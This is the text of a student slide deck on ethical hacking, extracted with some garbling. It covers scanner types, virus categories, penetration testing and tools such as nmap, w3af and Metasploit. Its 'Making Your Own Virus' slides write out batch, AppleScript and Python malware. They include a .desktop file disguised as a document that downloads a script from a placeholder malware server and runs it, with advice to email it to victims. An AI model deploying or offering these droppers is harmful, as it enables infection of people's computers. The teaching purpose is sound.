hacking helps to maintain and strengthen computer security. ⢠Get appointed at esteemed ..... and then, the attacker can hijack the user's session. In this way, the ...
Ethical Hacking Presented By: Sahil Babbar, Rachit Jain, Jinkeon Kang Mentor: Megha Agrawal
Contents 1. What is Hacking ? 2. Difference between Hacker & Cracker 3. What is Ethical Hacking ? 4. Hacker’s Skill Set
2
What Is Hacking ?
WHAT DO YOU THINK, WHO IS A HACKER ?
OR
3
What Is Hacking ? Getting into a system/network using unauthorised methods to gain access to sensitive information, BUT…
Hacker • Technically Skilled Professional. • Scan for vulnerabilities & pitfalls in the system/network architecture, with permissions. • Doesn’t has any malicious intentions. • Hacking is done for productive causes.
Cracker • Technically Skilled Professional. • Scan for vulnerabilities & pitfalls in the system/network architecture, without permissions. • Has any malicious intentions. • Cracking is done for thefts/damaging 4 systems/fun.
What Is Ethical Hacking ? Ethical Hacker is a skilled professional who hacks into a system/network to scan for pitfalls and the probable targets that a Cracker might exploit.
Ethical Hacking
≈ Hacking
Ethical Hacking
≠ Cracking
IMPORTANCE OF ETHICAL HACKING • Helps to maintain privacy & full control. • Helps to find system flaws and thereby avoiding leaking sensitive information to Crackers. • Since, computers are getting accessible to more and more people, ethical hacking helps to maintain and strengthen computer security. • Get appointed at esteemed government as well as multi-national organisations. 5
Hacker’s Skill Set Knowledge about: • Network Protocols like HTTP, HTTPS • Authentication Techniques • Firewall Architecture, Port Details • Network Architectures • Web Server Configurations • Web Application Structures • Database Setups with Client-Server Architecture • HTML, JavaScript, Python, Ruby • Shell Scripting • And More…
6
Ethical Hacking Tools • Vulnerability Scanners and their benefits • Types of Vulnerability Scanners • Password Cracking Tools
• Packet Sniffers • Popular Hacking Tools • Hacking Hardware 7
What are Hacking Tools? ❖
Hacking tools are software applications designed to serve one or several specific purposes to hack/crack. These are used to make complex hacking procedures, easy-to-use and nowadays, also offer good GUI to help beginners in Ethical Hacking.
❖
There are numerous types of hacking tools like:
1) Vulnerability Scanners 2) Port Scanners 3) Web Application Scanners 4) Password Cracking Tools 5) Packet Sniffers 8
Vulnerability Scanner ❖
Vulnerability can be defined as an unknown flaw in software, hardware or network which can exploited to gain unauthorised access.
❖
Vulnerability Scanner is a computer program that detects weak spots in a network or computer system as a whole.
❖
Since, all the communication is done using ports on the network, the vulnerability scanners detect open ports which can be used to exploit weakness in the computer system.
9
Benefits of Vulnerability Scanner
Run a software and show its output here.
❖
Quick and Easy Detection of Weak Spots in computer system.
❖
Since, it helps in identifying the vulnerabilities, therefore, in-turn the vulnerabilities can be fixed.
❖
Keeping a frequent check on the computer system.
❖
Example: Top 10 flashlight apps on Google Play Store.
This was found by Gary Miliefsky at Snoop Wall with the help of Vulnerability Scanners. These apps install Trojans that cannot be removed without doing Factory Reset. All information is sucked up by the servers mostly located in China, India and Russia.
10
Types of Vulnerability Scanners Port Scanning
TCP Scanning
❖
SYN Scanning
UDP Scanning
Window Scanning
Port Scanner is a software program that investigates(not attack) a server for open and active ports by sending client requests to a range of server port addresses. It is used to verify security policies or compromise the services running on the ports. ❖
Port Sweep is the technique of scanning multiple hosts for particular listening ports. Eg: SQL-based worms port sweep on multiple servers looking for TCP port number 1433. 11
Types of Vulnerability Scanners: TCP Scanner PORT #80
Hacker/ SysAdmin
PORT #3000
Using TCP Scanner
HOST Address 192.168.1.1 PORT #8080 Sending Carefully Constructed Packets to each of 65536 ports
Open or Accepted Closed or Denied Filtered, Dropped, Blocked
PORT #1433 Victim
Types of Vulnerability Scanners: TCP Scanner ❖
TCP Scanner uses network functionalities of the operating system to carry out the desired procedure.
❖
Procedure: Whenever the port on the host machine is open, TCP scanner immediately closes the connection, if TCP three-way handshake is completed, in order to prevent performing DoS(Denial-of-service) attack. Because, if the connection is not closed an error code is generated and registered in logs which can be detected by the system administrator.
❖
Advantage: Special level user privileges are not necessary.
❖
Disadvantages: • Using OS functionalities, renders low-level control. • “Noisy” method i.e. the services log the attacker’s IP Address and IDS can raise alarm. 13
Types of Vulnerability Scanners: SYN Scanner PORT #80
Hacker/ SysAdmin
PORT #3000
Using SYN Scanner
HOST Address 192.168.1.1 SYN
PORT #8080
Sending Raw SYN Packets to each of 65536 ports
PORT #1433 Victim
Replies with RST Packet in order to prevent 3-way TCP Handshake.
SYN-ACK RST
s rt i o p If
sed o l c
and
ilte unf
red
Types of Vulnerability Scanners: SYN Scanner ❖
Advantages: • SYN Scanner has full control of the packets that are sent to the host and can also monitor them like response timeouts, response details, etc. • Services running on the ports never actually establish a connection. SYN scanning is also called ‘Half-Open Scanning’ as full TCP connection is never established. • RST packet can cause damage to the network devices like printers, scanners.
❖
Disadvantages: SYN Scanner need privileges to generate raw packets that initiate the whole process.
15
Types of Vulnerability Scanners: UDP Scanner PORT #80
Hacker/ SysAdmin
PORT #3000
Using UDP Scanner Appl specifi ication c UDP Packe
t
HOST Address 192.168.1.1 PORT #53 PORT #1433
Just dropping packets to detect the state of the ports.
Response contains whether DNS Server is present or not
Re
m ro f ply
d se o l c
p
t or
loc b rt po
Victim
d ke
by
wa e r fi
ll
n he w m rts ble’ ro f o a d p ply m each ocke e o r Port is open R l f r ly t un is b p Re ‘hos age ss All ports are open me
ICMP port unreachable
16
Types of Vulnerability Scanners: UDP Scanner ❖
Advantages: • UDP Scanner can detect the number of open and closed ports by just dropping the packets and monitoring their responses. • Connection-less protocol.
❖
Disadvantages: • UDP application-specific scanning is limited by the number of ports for which application specific investigation packet is available or not. • Technical Challenges are involved.
17
Types of Vulnerability Scanners: Window Scanner PORT #80 PORT #3000 Hacker/ Using Window Scanner SysAdmin
HOST Address 192.168.1.1 PORT #8080 PORT #1433 Victim
111111xxxxx
Window size of the packet is pre-pended with 1’s due to design flaw
Types of Vulnerability Scanners: Window Scanner ❖
Advantages:
❖
Disadvantages: • Outdated • Not trustworthy • Nowadays, systems return the packet with pre-pended 0’s in the window field, therefore, signalling all the ports as closed.
Types of Vulnerability Scanners: WebApp Scanner
Hacker/ SysAdmin
Using WebApp Scanner
Front End
CRUD Operations Query DB Transactions on DB
HOST’s Website Address 192.168.1.1
Victim • Enables Black Box Testing. • Black Box Testing is a kind of application/ system testing where the tester has no clue about the business logic or processing of the web application/software and just have the information about the input and output. • Scanner interacts with the UI and architecture only but doesn’t scan source code.
Types of Vulnerability Scanners: WebApp Scanner ❖
Demo.
❖
Advantages:
❖
❖
Very handy tools which enable quick testing of the overall web application with less expertise.
❖
Full stack, from FrontEnd to BackEnd, can be tested with ease.
❖
Have good GUIs.
Disadvantages: ❖
The same tools are used by the attackers, thereby, bringing user and attacker on the same level.
❖
These are automated tools and help attackers to quickly test/find vulnerabilities and send botnets.
❖
Less efficient and reliable as these tools are not regularly updated at the same pace, with web application frameworks.
❖
Cannot detect logical errors in the source code.
Common Attacks & Viruses
22
Virus ❖
Virus is a self replicating malware program that keeps on duplicating/ cloning itself and planting its copies in various data files, boot sector, kernel, etc. They infect the area they reside in and often use stealth techniques to hide from antivirus softwares or IDS’s.
❖
Some viruses don’t harm the computer and some render it useless!
❖
Viruses have been causing billions of dollars every year!
Hex Dump of Blaster Worm
MacMag Virus on Mac(1988)
24
How it all started? ❖
Written in January 1986 called BRAIN by two brothers named Basit and Amjad.
❖
Inspired by new functionalities in MS-DOS Operating System like multitasking, new networking features.
❖
They left their full address, COPYRIGHT information and phone numbers inside the code of BRAIN!
❖
What is does ?: Infects the boot sector of the floppy disk by replacing it with a copy of the virus and the actual boot sector is moved to another sector which is marked as bad. The bad sectors occupy 5KB of disk space and makes 7KB of memory unavailable to MS-DOS. The malicious sector is named ©BRAIN and some description text is seen.
❖
Why they wrote it ?: To catch copyright infringers. Really?
Types of Viruses
Email
Browser Hijacker
Boot Infectors
FAT
Type of Viruses
Macro
Memory Resident
Overwrite
Direct Action
Directory
Macro Viruses ❖
These type of viruses are related to Macros which generally come embedded in programs/files like word processors, Microsoft Outlook, .mdb files, .xls files, etc. These viruses come into being whenever the user opens that document(that is why they are also called “document viruses”) and start infecting the user’s computer. Re
c pla
e
Macro Virus
❖
er t l /A
Macro Document
Examples: Relax, Melissa.A, bablas, 097M/Y2K 27
Memory Resident Viruses ❖
Memory Resident Virus installs and plants itself as a part of the Operating System, and it remain on RAM, whereas, non-memoryresident virus scans the disks for vulnerable targets, after its execution and infects them and exits from the computer. Tries to access disk sector
Resident Virus
Disk
OS
Virus directs the OS’s control flow the replication program, thereby, overwriting the interrupt handlers and other OS functions and finally infecting the targets.
❖
Examples: Jerusalem, Onehalf, Magistr, Junkie, Satanbug, etc. 28
Web Scripting Virus ❖
Web Scripting Virus reside inside the complex code of interactive web pages. This virus infects the complex code in order to compromise the user’s privacy and security. It can also infect browsers through the web pages and can spread through emails, RSS feeds, advertisement banners, etc. They can also breach access controls and are usually used to attack website with large user-base like social networking websites, banking websites, etc. ❖
❖
This virus is planted by stealing cookies from the user and then, the attacker can hijack the user’s session. In this way, the attacker can impersonate the user and this type of attack is called persistent attack.
Example: JS.Fortnight
29
Browser Hijacker ❖
Browser Hijacker uses browsers as medium to get to the victim’s computer either by faking the reality of attachments/extensions/add-ons. They infect browser’s functionalities like changing default settings without the approval of the user, provide excessive advertisement links, etc.
30
Browser Hijacker Attackers use malicious Google Chrome extensions to compromise users.
31
Other Viruses ❖
Overwrite Viruses replaces the original information with malicious code and they consume the same amount of file size. This is one of the reasons that the IDS’s cannot detect the infected files using file size conditions. These files become useless in most cases. ❖
❖
Examples: Trivial.88.D, TRj.reboot, etc.
Direct Action Viruses take action iff when they are executed or invoked due to a condition set by the hacker. These type of viruses usually reside in the hard disk’s root directory. They have a special feature that these viruses keep on changing their location, constantly. ❖
Examples: Dir-2, Virdem, Vienna, etc. 32
Other Viruses ❖
Boot Infectors infect the storage devices like floppy disks, hard disks but their record resides in a different location altogether. These viruses infect the booting functionalities of a computer as it directly infects the records in master boot. The BRAIN virus is also a boot infector which is extended to harm FAT entries, drives; massively reducing the performance speed.
❖
FAT Viruses infect the File Allocation Table which is responsible for maintaining all the information about disk space, file locations, usable space, read-only space, writable space, etc.
33
Making Your Own Virus ❖
❖
What to know? ❖
Windows: Batch Files
❖
Mac OS: AppleScript
❖
Linux: Shell, Python, Ruby, etc.
Batch Files are a type of scripts that run on Microsoft DOS and all versions of Microsoft Windows Operating Systems. These scripts are executed by command-line interpreter, line-by-line and simply stored in plain text files. They have .bat file extension. Conditional branching and looping are also supported by the batch scripts. 34
Making Your Own Virus(Windows) ❖
Making Virus in Windows using Batch files:
Copy cute-virus.bat “C:\Users\sys\AppData\Roaming\Microsoft\Windows\StartMenu \Programs\Startup Shutdown -s -t 00
When the victim executes the batch file, it will plant itself in the Startup folder of Windows and when the computer starts up next time, it will shutdown automatically, in “0” seconds. This type of virus is generally called “Shutdown Virus”. 35
Making Your Own Virus(Windows) ❖
Making Virus in Windows using Batch files:
@echo off // hiding batch commands :X
//variable
Start WinWord Start mspaint Start notepad : : Start calc Goto X When the victim executes the batch file, it will start opening the applications in the above order in an infinite loop. This type of virus is called “Application Bomber”. 36
Making Your Own Virus(Mac OS) ❖
Let’s start cooking our own virus in Mac OS X.
37
Making Your Own Virus(Mac OS) ❖
We can write short scripts like below:
repeat tell application “Google Chrome" activate end tell tell application "RubyMine" activate end tell tell application “Android Studio" activate end tell end repeat 38
Making Your Own Virus(Linux) ❖
Making Virus in Linux KDE flavour, using Python Scripts.
import os uname = os.getlogin() drop_dir = “/home/%s/.kde/Autostart” % uname) os.makedirs(drop_dir) os.symlink("/home/%s/.local/.hidden/s.py" % uname, drop_dir+“/s.py")
39
Making Your Own Virus(Linux) Creating a desktop icon: [Desktop Entry] Type=Application Name=some_text.odt Exec=bash -c 'URL=http://www.my_malware_server.com/s.py ; DROP=~/.local/.hidden ; mkdir -p $DROP; if [ -e /usr/bin/wget ] ; then wget $URL -O $DROP/s.py ; else curl $URL -o $DROP/s.py ; fi; python $DROP/s.py' Icon=/usr/share/icons/hicolor/48x48/apps/ooo-writer.png
40
Making Your Own Virus(Linux) • Send this file over email to the victim • So that once the file has been downloaded it will appear as some_text.odt on the user’s desktop with the harmless looking icon. • And once the attachment is opened by the victim it will infect the computer. • This malware script will also restart whenever the user logs in again into the computer.
41
Penetration Testing ❖
Penetration Testing is a technique of breaking into a system/network legally, in order to identify vulnerabilities and security flaws. It is also called Pen Testing or PT. PT is done by a security expert and not by a hacker.
❖
Advantages ❖
PT helps in safeguarding the system/network from several security attacks or vulnerabilities.
❖
PT helps to uncover security flaws to the system administrator, who can better understand the nature and potential of threats and exposes even minutest flaws.
❖
PT can be performed on wide variety of devices like servers, wired/wireless networks, mobile devices, etc.
❖
Helps save money, which could have been lost to a hacker.
42
Penetration Testing ❖
Not as easy as it seems!
❖
Following steps are involved in PT: ❖
Reconnaissance involves gathering all the required specifications of the computer system/network involved.
❖
Scanning involves searching the system/network for vulnerabilities, security flaws and entry points.
❖
Exploitation involves using the vulnerabilities/flaws/ entry points to attack the system/network and gain access.
❖
Maintaining Access involves maintaining the access to system/network after exploitation and verifying what extent of access can be maintained. 43
Penetration Testing ❖
Demo.
nmap -sP 192.168.1.1/24 This command discovers all the hosts that are up and running on the network.
44
nmap -sT -- reason 104.254.xxx.xxx This command discovers the state of all the ports, the service running on them and the reason for the status of the ports. 45
nmap -A 104.254.xxx.xxx This command discovers the state of all the ports, the service running on them and the reason for the status of the ports. 46
47
Zenmap GUI Based Nmap Client
48
P.T. Tool #1: w3af
❖
W3AF: Web Application Attack and Audit Framework is a penetration testing framework.
❖
Used for: ❖
Safe-guarding the web applications against attacks
❖
Can be used for attacking web applications
❖
Scanning Vulnerabilities
❖
Breaking Credentials
❖
And more
49
Target URL
Type of Attack
P.T. Profiles
Home Screen 50
Scanning www.usebackpack.com and found information and errors regarding the web application 51
Trying to decode the URL using Encode/Decode tool
52
Using the information to create Knowledge Base about the web application, in order to find vulnerabilities and security flaws. 53
Using the collected information to find vulnerabilities and security flaws. Here, we have found a Distributed Authoring and Version (WebDAV) Misconfiguration vulnerability. 54
Using the collected information to use different kind of exploits.
55
More vulnerability scanning of the web application which reveals more information.
56
Scanning some other host and found various vulnerabilities.
57
Listing only the vulnerabilities from the scanned information.
58
Getting the inter-linking diagram of all the URLs detected along with their respective HTML, CSS and JS files. 59
P.T Tool #2: Metasploit
❖
Specialities:
60
61
62
63
Running an exploit is as simple as:
64
65
66
